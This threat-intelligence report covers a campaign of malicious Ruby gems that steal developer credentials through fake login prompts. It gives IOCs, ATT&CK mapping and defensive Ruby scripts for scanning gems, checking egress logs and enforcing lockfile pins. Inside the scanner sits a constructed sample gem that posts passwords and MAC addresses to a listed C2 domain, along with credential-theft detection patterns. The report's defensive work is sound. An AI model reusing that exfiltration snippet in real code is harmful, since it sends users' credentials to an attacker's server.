Full Report
Sixty malicious Ruby gems containing credential-stealing code have been downloaded over 275,000 times since March 2023, targeting developer accounts. [...]
Analysis Summary
# Tool/Technique: Malicious Ruby Gems (Credential Stealing)
## Overview
A collection of 60 malicious Ruby gems distributed via the RubyGems repository, which were downloaded approximately 275,000 times. These gems masqueraded as legitimate development tools, but their true purpose was to steal user credentials entered into fake login forms.
## Technical Details
- Type: Malware (Supply Chain Attack Payload)
- Platform: Ruby. The gems are installed through RubyGems/Bundler, so the affected systems are developer workstations, CI/build agents and any application that pulls one of them in as a dependency.
- Capabilities: Interception and exfiltration of plaintext usernames and passwords, collection of MAC addresses for device fingerprinting, and package name tracking for campaign measurement.
- First Seen: The report gives no first-seen date for the code itself; the summary counts downloads from March 2023 onward, and the campaign was documented by Socket.
## MITRE ATT&CK Mapping
Based on the described functionality (a trojanized dependency that steals credentials from a fake login form):
- **TA0001 - Initial Access**
- T1195.001 - Supply Chain Compromise: Compromise Software Dependencies and Development Tools (the gem is pulled in as a trusted dependency; T1190 Exploit Public-Facing Application does not fit, since no exposed service is exploited)
- **TA0006 - Credential Access**
- T1056 - Input Capture (the fake login prompt captures whatever the user submits; T1056.001 Keylogging would apply only if keystrokes were hooked, which the report does not describe)
- **TA0007 - Discovery**
- T1016 - System Network Configuration Discovery (MAC address collection for device fingerprinting)
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel (credentials, MAC address and package name posted to the hardcoded domains)
## Functionality
### Core Capabilities
- **Credential Harvesting:** Presenting a fake login prompt as part of the gem's apparent workflow and capturing the username and password the user enters into it.
- **Data Exfiltration:** Sending harvested plaintext credentials, MAC addresses, and package names to hardcoded command-and-control (C2) infrastructure.
- **Deception:** Returning fabricated success or failure messages so the user believes a real login took place; no legitimate API call is ever made.
### Advanced Features
- **Fingerprinting:** Collecting the device's MAC address for device identification and tracking.
- **Campaign Tracking:** Collecting the name of the package being used to track the reach and effectiveness of the specific malicious gem variant.
- **Distribution/Reach:** Leveraging the trust placed in the RubyGems ecosystem for wide, low-friction distribution (this is reach, not persistence on the victim host; the report describes no persistence mechanism).
## Indicators of Compromise
- File Hashes: [Not provided in the source text]
- File Names: 60 distinct gem packages; individual gem names are not listed in the source text
- Registry Keys: [Not applicable/Not provided]
- Network Indicators:
- `programzon[.]com`
- `appspace[.]kr`
- `marketingduo[.]co[.]kr` (Linked to observed credential logs)
- Behavioral Indicators:
- Execution of code designed to present a login/authentication prompt that does not correspond to the expected behavior of the installed library.
- Outbound communication to the hardcoded C2 domains containing sensitive credentials in plaintext.
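The two behavioral indicators above translate directly into a check over egress records. As an added example, not code from the report or from Socket, the following matches each record against the network IOCs listed here and flags plaintext credentials posted to hosts outside an allowlist. The record format, the allowlist, the credential field names and the sample records are all constructed for this example; the `pw`, `mac` and `pkg` field names are assumptions standing in for whatever the real gems used.

```ruby
# Added example: apply the network IOCs and the behavioural indicator
# above to egress records. Not code from the report.
require "uri"

# Network IOCs quoted in the report, defanging removed.
C2_DOMAINS = %w[programzon.com appspace.kr marketingduo.co.kr].freeze
# Assumption: hosts a developer workstation or build agent is expected to reach.
EGRESS_ALLOWLIST = %w[rubygems.org index.rubygems.org].freeze
CREDENTIAL_KEYS = %w[password passwd pw pass].freeze

Alert = Struct.new(:host, :reasons)

# True when host equals one of domains or is a subdomain of it.
def host_in?(host, domains)
  domains.any? { |d| host == d || host.end_with?(".#{d}") }
end

# Record format (constructed for this example): "METHOD URL BODY", where BODY
# is the form-encoded request body or "-" when none was logged.
def analyze_record(record)
  method, url, body = record.split(" ", 3)
  host = URI(url).host.to_s.downcase
  reasons = []
  reasons << :known_c2_domain if host_in?(host, C2_DOMAINS)
  if method == "POST" && body && body != "-" && !host_in?(host, EGRESS_ALLOWLIST)
    keys = URI.decode_www_form(body).map { |k, _| k.downcase }
    reasons << :plaintext_credential_egress unless (keys & CREDENTIAL_KEYS).empty?
    reasons << :device_fingerprint if keys.include?("mac")
  end
  reasons.empty? ? nil : Alert.new(host, reasons)
end

def analyze(records)
  records.filter_map { |r| analyze_record(r) }
end

# Constructed sample records; the field names (pw, mac, pkg) are assumptions.
SAMPLE_EGRESS = [
  "GET https://index.rubygems.org/versions -",
  "POST https://programzon.com/api/login id=dev&pw=hunter2&mac=aa:bb:cc:dd:ee:ff&pkg=sample_gem",
  "POST https://api.example.invalid/session user=dev&password=hunter2",
  "POST https://rubygems.org/api/v1/gems gem_name=sample_gem",
].freeze

if $PROGRAM_NAME == __FILE__
  analyze(SAMPLE_EGRESS).each { |a| puts "#{a.host}: #{a.reasons.join(', ')}" }
end
```

The second record trips all three reasons (known C2 host, credential field, MAC field); the third trips only the credential check, which is the one that still fires when a future variant moves to a domain not yet on any IOC list. Body inspection assumes a TLS-terminating proxy or application-level request log; where only connection metadata is available, the domain match is all that remains.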
## Associated Threat Actors
- Attribution is not explicitly made to a named group. Logs tied to the `marketingduo[.]co[.]kr` infrastructure suggest a connection to actors who monitor Russian-speaking darknet markets.
## Detection Methods
- Signature-based detection: Matching known malicious gem names and hashes, or code patterns inside installed gems (hardcoded C2 domains, HTTP POSTs of password-like fields, MAC address lookups) that the legitimate library has no reason to contain.
- Behavioral detection: Monitoring outbound connections from development environments and build agents, especially right after a new gem is installed, for traffic to unfamiliar domains and for plaintext credentials in request bodies.
- YARA rules: Applicable for detecting common code patterns or embedded strings related to the exfiltration mechanism across potential future variants.
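As an added example of the signature-based approach (not code from the report or from Socket), the scanner below walks a directory of unpacked gem sources, reports files containing the network IOCs listed above, and flags files that combine an HTTP POST, password-like fields and MAC address collection. The two sample gem sources it scans are constructed for this example, and the regular expressions are illustrative rather than a published rule set.

```ruby
# Added example: signature-style scan of unpacked gem sources for the traits
# described in the report. Not code from the report or from Socket.
require "tmpdir"
require "fileutils"

# Network IOCs quoted in the report, with the defanging brackets removed.
C2_DOMAINS = %w[programzon.com appspace.kr marketingduo.co.kr].freeze

# Illustrative code patterns (assumed, not a published rule set). Any one
# alone is ordinary; all three in one file match the described behaviour:
# credentials and a MAC address posted to a hardcoded host.
PATTERNS = {
  http_post:        /Net::HTTP\.post|\.post_form\(|HTTP\.post\(/,
  credential_field: /\b(password|passwd|pw)\b/i,
  mac_collection:   /\bmacaddr\b|getifaddrs|\bifconfig\b|\bip\s+link\b/i,
}.freeze

Finding = Struct.new(:path, :kind, :detail)

# Scan one Ruby file; returns an array of Finding (empty when clean).
def scan_file(path)
  src = File.read(path)
  findings = []
  C2_DOMAINS.each do |domain|
    findings << Finding.new(path, :ioc_domain, domain) if src.include?(domain)
  end
  hits = PATTERNS.select { |_, re| src.match?(re) }.keys
  if hits.length == PATTERNS.length
    findings << Finding.new(path, :credential_exfil_pattern, hits.join(","))
  end
  findings
end

# Scan every .rb file under root (for example the output of `gem unpack`),
# sorted so results are deterministic.
def scan_gem_dir(root)
  Dir.glob(File.join(root, "**", "*.rb")).sort.flat_map { |f| scan_file(f) }
end

# Constructed sample sources for a stand-alone run; these are not real gems.
SUSPICIOUS_SRC = <<~'RUBY'
  require "net/http"
  require "macaddr"
  module ConstructedSample
    def self.login(user, password)
      uri = URI("https://programzon.com/api/login")
      Net::HTTP.post_form(uri, "id" => user, "pw" => password,
                               "mac" => Mac.addr, "pkg" => "constructed_sample")
      { success: true } # fake success, nothing is verified
    end
  end
RUBY

BENIGN_SRC = <<~'RUBY'
  module Greeter
    def self.hello(name)
      "hello, " + name
    end
  end
RUBY

# Write both samples into a gem-like tree under root and return root.
def write_samples(root)
  { "suspicious_gem-0.1.0/lib/suspicious_gem.rb" => SUSPICIOUS_SRC,
    "benign_gem-1.0.0/lib/benign_gem.rb" => BENIGN_SRC }.each do |rel, body|
    path = File.join(root, rel)
    FileUtils.mkdir_p(File.dirname(path))
    File.write(path, body)
  end
  root
end

if $PROGRAM_NAME == __FILE__
  Dir.mktmpdir do |dir|
    scan_gem_dir(write_samples(dir)).each do |f|
      puts "#{f.kind}\t#{f.path}\t#{f.detail}"
    end
  end
end
```

To scan a real environment, point `scan_gem_dir` at the paths printed by `bundle show --paths` or at a directory produced by `gem unpack`. The domain match is the high-confidence signal; the three-pattern combination is a heuristic that will also fire on legitimate client libraries that log in and read a MAC address, so treat it as a triage queue rather than a verdict.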
## Mitigation Strategies
- **Dependency Vetting:** Developers must scrutinize all third-party libraries sourced from open-source repositories (like RubyGems) for signs of suspicious behavior, such as obfuscated code.
- **Reputation Checking:** Verifying the publisher’s reputation and release history before adopting new dependencies.
- **Dependency Locking:** Pinning dependencies to specific, reviewed versions in the Gemfile, committing Gemfile.lock, and installing in Bundler's frozen mode (`BUNDLE_FROZEN=true`) so a build fails rather than silently resolving to a new, unreviewed release.
- **Network Monitoring:** Implementing egress filtering or monitoring to detect unauthorized transmissions of credentials or sensitive system information outside the standard application flow.
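The vetting and locking items above can be enforced mechanically. As an added example (not code from the report or from Socket), the script below parses the `GEM` and `DEPENDENCIES` sections of a Gemfile.lock and reports any remote outside an approved list, any direct dependency whose Gemfile constraint is not an exact `=` pin, and any resolved gem that is not on a reviewed allowlist. The sample lockfile, the approved-remote list and the `VETTED_GEMS` allowlist are constructed for this example.

```ruby
# Added example: enforce a dependency-locking policy on a Gemfile.lock.
# Not code from the report; the policy lists are assumptions.
Lock = Struct.new(:remotes, :specs, :dependencies)

# Minimal parser for the GEM and DEPENDENCIES sections of a Gemfile.lock.
def parse_lockfile(text)
  lock = Lock.new([], {}, {})
  section = nil
  text.each_line do |raw|
    line = raw.chomp
    next if line.strip.empty?
    if line !~ /\A\s/                # unindented lines name a section
      section = line.strip
      next
    end
    indent = line[/\A */].size
    body = line.strip
    case section
    when "GEM"
      if body.start_with?("remote:")
        lock.remotes << body.sub("remote:", "").strip
      elsif indent == 4 && (m = body.match(/\A(\S+) \(([^)]+)\)\z/))
        lock.specs[m[1]] = m[2]      # resolved gem => exact version; deeper lines are sub-deps
      end
    when "DEPENDENCIES"
      # "name", "name!" (path/git source) or "name (constraint)"
      if (m = body.match(/\A(\S+?)!?(?: \(([^)]+)\))?\z/))
        lock.dependencies[m[1]] = m[2]
      end
    end
  end
  lock
end

# Assumptions for this example: only the public index is an approved source,
# and VETTED_GEMS stands in for a list the team has actually reviewed.
ALLOWED_REMOTES = ["https://rubygems.org/"].freeze
VETTED_GEMS = %w[rake].freeze

# Returns human-readable policy violations; an empty array means the lock passes.
def check_policy(lock, vetted = VETTED_GEMS, allowed_remotes = ALLOWED_REMOTES)
  problems = []
  (lock.remotes - allowed_remotes).each { |r| problems << "unapproved source: #{r}" }
  lock.dependencies.each do |name, constraint|
    next if constraint&.start_with?("= ")
    problems << "#{name}: not pinned to an exact version in the Gemfile (constraint: #{constraint.inspect})"
  end
  (lock.specs.keys - vetted).each do |name|
    problems << "#{name} #{lock.specs[name]}: not on the vetted list"
  end
  problems
end

# Constructed lockfile for a stand-alone run (not taken from any real project).
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    remote: https://gems.example.invalid/
    specs:
      new-helper (0.1.0)
        rake (>= 12)
      rake (13.2.1)

  PLATFORMS
    ruby

  DEPENDENCIES
    new-helper
    rake (= 13.2.1)

  BUNDLED WITH
     2.5.0
LOCK

if $PROGRAM_NAME == __FILE__
  problems = check_policy(parse_lockfile(SAMPLE_LOCK))
  puts(problems.empty? ? "lockfile passes policy" : problems)
end
```

Swap `SAMPLE_LOCK` for `File.read("Gemfile.lock")` and run it as a CI step before `bundle install`; combined with `BUNDLE_FROZEN=true`, a pull request that adds an unreviewed gem or loosens a pin fails the build instead of quietly changing what gets installed. The vetted list is the expensive part: it only helps if someone actually reads the gem before adding a name to it.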
## Related Tools/Techniques
- Previous Malicious Ruby Gems targeting Fastlane/Telegram API developers (supply chain attack vectors).
- Supply chain attacks leveraging other package managers (e.g., npm, PyPI).